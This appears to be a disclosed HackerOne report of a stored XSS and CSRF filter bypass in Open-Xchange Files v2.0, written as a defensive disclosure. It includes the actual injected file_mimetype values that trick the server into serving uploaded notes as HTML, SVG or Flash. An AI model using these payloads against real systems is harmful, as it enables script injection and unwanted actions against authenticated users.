Open-Xchange: [XSS/CSRF] filter content-type bypass in Files v2.0

2018-03-05T10:00:09
ID H1:321980
Type hackerone
Reporter secator
Modified 2020-01-24T11:50:27

Description

Hi.

> sandbox.open-xchange.com runs a version that contains a fix for your first report

First report #304098

> If you found a valid workaround, please open a new report, thanks :)

:) Yeah, I tested now in sandbox.

Steps: 1. Add Note with any html tags 2. Change Fileinfo: json {"file":{"file_mimetype":"text/plain;,text/html","filename":"test-txt"}} {"file":{"file_mimetype":"text/plain;,image/svg+xml","filename":"test-txt"}} ... {"file":{"file_mimetype":"text/plain;,application/x-shockwave-flash"}} // for CSRF

  1. Open attachment, response headers: Content-Type: text/plain; ,text/html;charset=UTF-8

This content-type valid for any browsers.

Impact

malicious code injection (html) && execute unwanted actions on a web application in which they're currently authenticated (flash)

The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:

URL https://sandbox.open-xchange.com

Verified Yes